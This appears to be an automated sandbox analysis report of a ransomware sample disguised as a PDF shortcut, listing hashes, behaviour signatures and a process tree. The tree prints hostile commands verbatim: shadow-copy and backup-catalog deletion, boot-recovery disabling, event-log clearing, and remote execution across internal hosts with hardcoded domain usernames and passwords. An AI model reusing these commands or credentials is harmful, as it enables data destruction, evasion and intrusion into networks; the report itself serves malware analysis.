Overview
overview
10Static
static
60d7dc074be...41c.js
windows7_x64
70d7dc074be...41c.js
windows10_x64
73b7cd07e87...ce.lnk
windows7_x64
103b7cd07e87...ce.lnk
windows10_x64
1079e21ff914...3c.exe
windows7_x64
179e21ff914...3c.exe
windows10_x64
183c375dcda...90.lnk
windows7_x64
1083c375dcda...90.lnk
windows10_x64
10a81f152a31...5d.exe
windows7_x64
10a81f152a31...5d.exe
windows10_x64
1c7cf5c62ec...20.lnk
windows7_x64
10c7cf5c62ec...20.lnk
windows10_x64
10db5d09edc2...f1.lnk
windows7_x64
10db5d09edc2...f1.lnk
windows10_x64
10e678ec3dbc...2f.exe
windows7_x64
1e678ec3dbc...2f.exe
windows10_x64
1f5f79e2169...9e.lnk
windows7_x64
10f5f79e2169...9e.lnk
windows10_x64
10Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
26-12-2020 20:21
Static task
static1
Behavioral task
behavioral1
Sample
0d7dc074be83f1096f39ba95bfc4e1a17c411dbed0e5eeeb48e88a12d79b541c.js
Resource
win7v20201028
Behavioral task
behavioral2
Sample
0d7dc074be83f1096f39ba95bfc4e1a17c411dbed0e5eeeb48e88a12d79b541c.js
Resource
win10v20201028
Behavioral task
behavioral3
Sample
3b7cd07e87902deae4b482e987dea9e25a93a55ec783884e8b466dc55c346bce.lnk
Resource
win7v20201028
Behavioral task
behavioral4
Sample
3b7cd07e87902deae4b482e987dea9e25a93a55ec783884e8b466dc55c346bce.lnk
Resource
win10v20201028
Behavioral task
behavioral5
Sample
79e21ff9142821b2e3d6e3dc8d812e86da231dbbd1217415b4add748a4c1ce3c.exe
Resource
win7v20201028
Behavioral task
behavioral6
Sample
79e21ff9142821b2e3d6e3dc8d812e86da231dbbd1217415b4add748a4c1ce3c.exe
Resource
win10v20201028
Behavioral task
behavioral7
Sample
83c375dcdadb8467955f5e124cf4e8d6eac78c51c03fb7393dc810a243ba1a90.lnk
Resource
win7v20201028
Behavioral task
behavioral8
Sample
83c375dcdadb8467955f5e124cf4e8d6eac78c51c03fb7393dc810a243ba1a90.lnk
Resource
win10v20201028
Behavioral task
behavioral9
Sample
a81f152a31c03b45dbcf29439050bbe080b1f6308b032aebc0205886d1f41e5d.exe
Resource
win7v20201028
Behavioral task
behavioral10
Sample
a81f152a31c03b45dbcf29439050bbe080b1f6308b032aebc0205886d1f41e5d.exe
Resource
win10v20201028
Behavioral task
behavioral11
Sample
c7cf5c62ecfade27338acb2cc91a06c2615dbb97711f2558a9379ee8a5306720.lnk
Resource
win7v20201028
Behavioral task
behavioral12
Sample
c7cf5c62ecfade27338acb2cc91a06c2615dbb97711f2558a9379ee8a5306720.lnk
Resource
win10v20201028
Behavioral task
behavioral13
Sample
db5d09edc2e9676a41f26f5f4310df9d13abdae8011b1d37af7139008362d5f1.lnk
Resource
win7v20201028
Behavioral task
behavioral14
Sample
db5d09edc2e9676a41f26f5f4310df9d13abdae8011b1d37af7139008362d5f1.lnk
Resource
win10v20201028
Behavioral task
behavioral15
Sample
e678ec3dbccfbd5cf0f303d2841e726ac7628044de5297bf9ebe791d66270a2f.exe
Resource
win7v20201028
Behavioral task
behavioral16
Sample
e678ec3dbccfbd5cf0f303d2841e726ac7628044de5297bf9ebe791d66270a2f.exe
Resource
win10v20201028
Behavioral task
behavioral17
Sample
f5f79e2169db3bbe7b7ae3ff4a0f40659d11051e69ee784f5469659a708e829e.lnk
Resource
win7v20201028
Behavioral task
behavioral18
Sample
f5f79e2169db3bbe7b7ae3ff4a0f40659d11051e69ee784f5469659a708e829e.lnk
Resource
win10v20201028
General
-
Target
f5f79e2169db3bbe7b7ae3ff4a0f40659d11051e69ee784f5469659a708e829e.lnk
-
Size
938KB
-
MD5
cb908352d719b9e0a7142c4110ae502e
-
SHA1
e50a8c33b315517a4bad5eb35fb09e572c3ee9fa
-
SHA256
f5f79e2169db3bbe7b7ae3ff4a0f40659d11051e69ee784f5469659a708e829e
-
SHA512
9502d7c069532571277e3c8c849e9ce81130a11bf5ad892dad688aa9e53973abc76fb5b53aee72ca37fe29e50aa2543f2681a6d849ada59b9e07ff6e3b574909
Malware Config
Signatures
-
Clears Windows event logs 1 TTPs
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
Processes:
bcdedit.exebcdedit.exepid process 3820 bcdedit.exe 252 bcdedit.exe -
Processes:
wbadmin.exepid process 3568 wbadmin.exe -
Executes dropped EXE 155 IoCs
Processes:
vfrkl.exe_umx.exe_fif.exe_fif.exe_fif.exe_fif.exePSEXESVC.exe_ple.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_ple.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_ple.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_ple.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_ple.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exepid process 412 vfrkl.exe 3428 _umx.exe 4088 _fif.exe 2600 _fif.exe 3908 _fif.exe 3060 _fif.exe 1856 PSEXESVC.exe 1892 _ple.exe 2672 _fif.exe 3212 _fif.exe 3236 _fif.exe 1516 _fif.exe 2632 _fif.exe 3120 _fif.exe 892 _fif.exe 496 _fif.exe 188 _ple.exe 1860 _fif.exe 1940 _fif.exe 2340 _fif.exe 4196 _fif.exe 4208 _fif.exe 4344 _ple.exe 4332 _fif.exe 4384 _fif.exe 4424 _fif.exe 4536 _fif.exe 4604 _fif.exe 4716 _fif.exe 4728 _fif.exe 4840 _ple.exe 4816 _fif.exe 4828 _fif.exe 4908 _fif.exe 5024 _fif.exe 5072 _fif.exe 5116 _ple.exe 4152 _fif.exe 1888 _fif.exe 2916 _fif.exe 1032 _fif.exe 4300 _fif.exe 4308 _fif.exe 4212 _fif.exe 4056 _fif.exe 4176 _fif.exe 4360 _fif.exe 4440 _fif.exe 4504 _fif.exe 4596 _fif.exe 4680 _fif.exe 4660 _fif.exe 4784 _fif.exe 4760 _fif.exe 4636 _fif.exe 4856 _fif.exe 4820 _fif.exe 4996 _fif.exe 5052 _fif.exe 1196 _fif.exe 5104 _fif.exe 3796 _fif.exe 4320 _fif.exe 4160 _fif.exe -
Drops file in Windows directory 9 IoCs
Processes:
_fif.exe_fif.exenotepad.exenotepad.exenotepad.exenotepad.exe_fif.exe_fif.exenotepad.exedescription ioc process File created C:\Windows\PSEXESVC.exe _fif.exe File created C:\Windows\PSEXESVC.exe _fif.exe File opened for modification C:\Windows\_ple.exe notepad.exe File opened for modification C:\Windows\_ple.exe notepad.exe File opened for modification C:\Windows\_ple.exe notepad.exe File opened for modification C:\Windows\_ple.exe notepad.exe File created C:\Windows\PSEXESVC.exe _fif.exe File created C:\Windows\PSEXESVC.exe _fif.exe File opened for modification C:\Windows\_ple.exe notepad.exe -
Checks SCSI registry key(s) 3 TTPs 4 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
vds.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\FriendlyName vds.exe -
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exepid process 4000 vssadmin.exe -
Modifies data under HKEY_USERS 296 IoCs
Processes:
_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec _fif.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1" _fif.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1" _fif.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec _fif.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec _fif.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec _fif.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1" _fif.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1" _fif.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec _fif.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec _fif.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1" _fif.exe Key created \REGISTRY\USER\.DEFAULT\Software _fif.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1" _fif.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1" _fif.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1" _fif.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec _fif.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec _fif.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1" _fif.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec _fif.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec _fif.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1" _fif.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1" _fif.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1" _fif.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec _fif.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec _fif.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1" _fif.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1" _fif.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec _fif.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec _fif.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec _fif.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1" _fif.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1" _fif.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1" _fif.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec _fif.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec _fif.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec _fif.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1" _fif.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1" _fif.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec _fif.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec _fif.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1" _fif.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec _fif.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1" _fif.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec _fif.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec _fif.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec _fif.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1" _fif.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1" _fif.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1" _fif.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1" _fif.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1" _fif.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals _fif.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec _fif.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1" _fif.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec _fif.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec _fif.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec _fif.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec _fif.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1" _fif.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec _fif.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1" _fif.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec _fif.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1" _fif.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1" _fif.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
vfrkl.exepid process 412 vfrkl.exe 412 vfrkl.exe 412 vfrkl.exe 412 vfrkl.exe 412 vfrkl.exe 412 vfrkl.exe -
Suspicious use of AdjustPrivilegeToken 84 IoCs
Processes:
_ftf.exevfrkl.exe_umx.exevssvc.exe_ple.exewbengine.exe_ple.exe_fif.exe_ple.exewevtutil.exe_ple.exedescription pid process Token: SeAssignPrimaryTokenPrivilege 1740 _ftf.exe Token: SeIncreaseQuotaPrivilege 1740 _ftf.exe Token: SeSecurityPrivilege 1740 _ftf.exe Token: SeTakeOwnershipPrivilege 1740 _ftf.exe Token: SeLoadDriverPrivilege 1740 _ftf.exe Token: SeSystemtimePrivilege 1740 _ftf.exe Token: SeBackupPrivilege 1740 _ftf.exe Token: SeRestorePrivilege 1740 _ftf.exe Token: SeShutdownPrivilege 1740 _ftf.exe Token: SeSystemEnvironmentPrivilege 1740 _ftf.exe Token: SeUndockPrivilege 1740 _ftf.exe Token: SeManageVolumePrivilege 1740 _ftf.exe Token: SeDebugPrivilege 412 vfrkl.exe Token: SeShutdownPrivilege 3428 _umx.exe Token: SeBackupPrivilege 612 vssvc.exe Token: SeRestorePrivilege 612 vssvc.exe Token: SeAuditPrivilege 612 vssvc.exe Token: SeAssignPrimaryTokenPrivilege 1892 _ple.exe Token: SeIncreaseQuotaPrivilege 1892 _ple.exe Token: SeSecurityPrivilege 1892 _ple.exe Token: SeTakeOwnershipPrivilege 1892 _ple.exe Token: SeLoadDriverPrivilege 1892 _ple.exe Token: SeSystemtimePrivilege 1892 _ple.exe Token: SeBackupPrivilege 1892 _ple.exe Token: SeRestorePrivilege 1892 _ple.exe Token: SeShutdownPrivilege 1892 _ple.exe Token: SeSystemEnvironmentPrivilege 1892 _ple.exe Token: SeUndockPrivilege 1892 _ple.exe Token: SeManageVolumePrivilege 1892 _ple.exe Token: SeBackupPrivilege 264 wbengine.exe Token: SeRestorePrivilege 264 wbengine.exe Token: SeSecurityPrivilege 264 wbengine.exe Token: SeAssignPrimaryTokenPrivilege 188 _ple.exe Token: SeIncreaseQuotaPrivilege 188 _ple.exe Token: SeSecurityPrivilege 188 _ple.exe Token: SeTakeOwnershipPrivilege 188 _ple.exe Token: SeLoadDriverPrivilege 188 _ple.exe Token: SeSystemtimePrivilege 188 _ple.exe Token: SeBackupPrivilege 188 _ple.exe Token: SeRestorePrivilege 188 _ple.exe Token: SeShutdownPrivilege 188 _ple.exe Token: SeSystemEnvironmentPrivilege 188 _ple.exe Token: SeUndockPrivilege 188 _ple.exe Token: SeManageVolumePrivilege 188 _ple.exe Token: SeSecurityPrivilege 4220 _fif.exe Token: SeBackupPrivilege 4220 _fif.exe Token: SeAssignPrimaryTokenPrivilege 4344 _ple.exe Token: SeIncreaseQuotaPrivilege 4344 _ple.exe Token: SeSecurityPrivilege 4344 _ple.exe Token: SeTakeOwnershipPrivilege 4344 _ple.exe Token: SeLoadDriverPrivilege 4344 _ple.exe Token: SeSystemtimePrivilege 4344 _ple.exe Token: SeBackupPrivilege 4344 _ple.exe Token: SeRestorePrivilege 4344 _ple.exe Token: SeShutdownPrivilege 4344 _ple.exe Token: SeSystemEnvironmentPrivilege 4344 _ple.exe Token: SeUndockPrivilege 4344 _ple.exe Token: SeManageVolumePrivilege 4344 _ple.exe Token: SeSecurityPrivilege 4664 wevtutil.exe Token: SeBackupPrivilege 4664 wevtutil.exe Token: SeAssignPrimaryTokenPrivilege 4840 _ple.exe Token: SeIncreaseQuotaPrivilege 4840 _ple.exe Token: SeSecurityPrivilege 4840 _ple.exe Token: SeTakeOwnershipPrivilege 4840 _ple.exe -
Suspicious use of WriteProcessMemory 519 IoCs
Processes:
cmd.execmd.exePSEXESVC.exe_ftf.exe_umx.execmd.execmd.exePSEXESVC.exe_ple.exedescription pid process target process PID 1108 wrote to memory of 4004 1108 cmd.exe cmd.exe PID 1108 wrote to memory of 4004 1108 cmd.exe cmd.exe PID 4004 wrote to memory of 3988 4004 cmd.exe cmd.exe PID 4004 wrote to memory of 3988 4004 cmd.exe cmd.exe PID 4004 wrote to memory of 3288 4004 cmd.exe find.exe PID 4004 wrote to memory of 3288 4004 cmd.exe find.exe PID 4004 wrote to memory of 3208 4004 cmd.exe wscript.exe PID 4004 wrote to memory of 3208 4004 cmd.exe wscript.exe PID 1352 wrote to memory of 1740 1352 PSEXESVC.exe _ftf.exe PID 1352 wrote to memory of 1740 1352 PSEXESVC.exe _ftf.exe PID 1352 wrote to memory of 1740 1352 PSEXESVC.exe _ftf.exe PID 1740 wrote to memory of 412 1740 _ftf.exe vfrkl.exe PID 1740 wrote to memory of 412 1740 _ftf.exe vfrkl.exe PID 1740 wrote to memory of 3428 1740 _ftf.exe _umx.exe PID 1740 wrote to memory of 3428 1740 _ftf.exe _umx.exe PID 1740 wrote to memory of 3428 1740 _ftf.exe _umx.exe PID 3428 wrote to memory of 3980 3428 _umx.exe cmd.exe PID 3428 wrote to memory of 3980 3428 _umx.exe cmd.exe PID 1740 wrote to memory of 4088 1740 _ftf.exe _fif.exe PID 1740 wrote to memory of 4088 1740 _ftf.exe _fif.exe PID 1740 wrote to memory of 4088 1740 _ftf.exe _fif.exe PID 1740 wrote to memory of 2600 1740 _ftf.exe _fif.exe PID 1740 wrote to memory of 2600 1740 _ftf.exe _fif.exe PID 1740 wrote to memory of 2600 1740 _ftf.exe _fif.exe PID 1740 wrote to memory of 3908 1740 _ftf.exe _fif.exe PID 1740 wrote to memory of 3908 1740 _ftf.exe _fif.exe PID 1740 wrote to memory of 3908 1740 _ftf.exe _fif.exe PID 3980 wrote to memory of 4000 3980 cmd.exe vssadmin.exe PID 3980 wrote to memory of 4000 3980 cmd.exe vssadmin.exe PID 1740 wrote to memory of 3060 1740 _ftf.exe _fif.exe PID 1740 wrote to memory of 3060 1740 _ftf.exe _fif.exe PID 1740 wrote to memory of 3060 1740 _ftf.exe _fif.exe PID 3428 wrote to memory of 2164 3428 _umx.exe cmd.exe PID 3428 wrote to memory of 2164 3428 _umx.exe cmd.exe PID 1740 wrote to memory of 2672 1740 _ftf.exe _fif.exe PID 2164 wrote to memory of 3568 2164 cmd.exe wbadmin.exe PID 2164 wrote to memory of 3568 2164 cmd.exe wbadmin.exe PID 1856 wrote to memory of 1892 1856 PSEXESVC.exe _ple.exe PID 1856 wrote to memory of 1892 1856 PSEXESVC.exe _ple.exe PID 1856 wrote to memory of 1892 1856 PSEXESVC.exe _ple.exe PID 1740 wrote to memory of 2672 1740 _ftf.exe _fif.exe PID 1740 wrote to memory of 2672 1740 _ftf.exe _fif.exe PID 1892 wrote to memory of 2872 1892 _ple.exe notepad.exe PID 1892 wrote to memory of 2872 1892 _ple.exe notepad.exe PID 1892 wrote to memory of 2872 1892 _ple.exe notepad.exe PID 1892 wrote to memory of 2872 1892 _ple.exe notepad.exe PID 1892 wrote to memory of 2872 1892 _ple.exe notepad.exe PID 1740 wrote to memory of 3212 1740 _ftf.exe _fif.exe PID 1740 wrote to memory of 3212 1740 _ftf.exe _fif.exe PID 1740 wrote to memory of 3212 1740 _ftf.exe _fif.exe PID 1740 wrote to memory of 3236 1740 _ftf.exe _fif.exe PID 1740 wrote to memory of 3236 1740 _ftf.exe _fif.exe PID 1740 wrote to memory of 3236 1740 _ftf.exe _fif.exe PID 1740 wrote to memory of 1516 1740 _ftf.exe _fif.exe PID 1740 wrote to memory of 1516 1740 _ftf.exe _fif.exe PID 1740 wrote to memory of 1516 1740 _ftf.exe _fif.exe PID 1740 wrote to memory of 2632 1740 _ftf.exe _fif.exe PID 1740 wrote to memory of 2632 1740 _ftf.exe _fif.exe PID 1740 wrote to memory of 2632 1740 _ftf.exe _fif.exe PID 1740 wrote to memory of 3120 1740 _ftf.exe _fif.exe PID 1740 wrote to memory of 3120 1740 _ftf.exe _fif.exe PID 1740 wrote to memory of 3120 1740 _ftf.exe _fif.exe PID 1740 wrote to memory of 892 1740 _ftf.exe _fif.exe PID 1740 wrote to memory of 892 1740 _ftf.exe _fif.exe
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\f5f79e2169db3bbe7b7ae3ff4a0f40659d11051e69ee784f5469659a708e829e.lnk1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c path=C:\Windows\system32&move "VerificationDocuments.pdf.lnk " "C:\Users\Admin\AppData\Local\Temp\1.lnk"&type "C:\Users\Admin\AppData\Local\Temp\1.lnk"|find "END2">"C:\Users\Admin\AppData\Local\Temp\0.js"&wscript "C:\Users\Admin\AppData\Local\Temp\0.js"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" type "C:\Users\Admin\AppData\Local\Temp\1.lnk""3⤵
-
C:\Windows\system32\find.exefind "END2"3⤵
-
C:\Windows\system32\wscript.exewscript "C:\Users\Admin\AppData\Local\Temp\0.js"3⤵
-
C:\Windows\PSEXESVC.exeC:\Windows\PSEXESVC.exe1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\_ftf.exe"_ftf.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\TEMP\vfrkl.exe123 \\.\pipe\280E9885-CDBC-4DAE-8FA4-2E26A1A5442E3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\TEMP\_umx.exe"C:\Windows\TEMP\_umx.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c c:\Windows\system32\vssadmin.exe delete shadows /all /quiet4⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\Windows\system32\vssadmin.exec:\Windows\system32\vssadmin.exe delete shadows /all /quiet5⤵
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wbadmin.exe delete catalog -quiet4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet5⤵
- Deletes backup catalog
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no4⤵
-
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} bootstatuspolicy ignoreallfailures5⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled no5⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wevtutil.exe cl System4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wevtutil.exe cl Security4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security5⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\igmp.mcast.net -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
- Executes dropped EXE
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\Ewycradz -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\Ewycradz -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\Ewycradz -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\10.10.0.65 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
- Executes dropped EXE
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\255.255.255.255 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
- Executes dropped EXE
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\10.10.0.94 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
- Executes dropped EXE
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\255.255.255.255 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
- Executes dropped EXE
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\Ewycradz -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\224.0.0.22 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
- Executes dropped EXE
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\10.10.0.255 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
- Executes dropped EXE
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\239.255.255.250 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
- Executes dropped EXE
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\Ewycradz -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
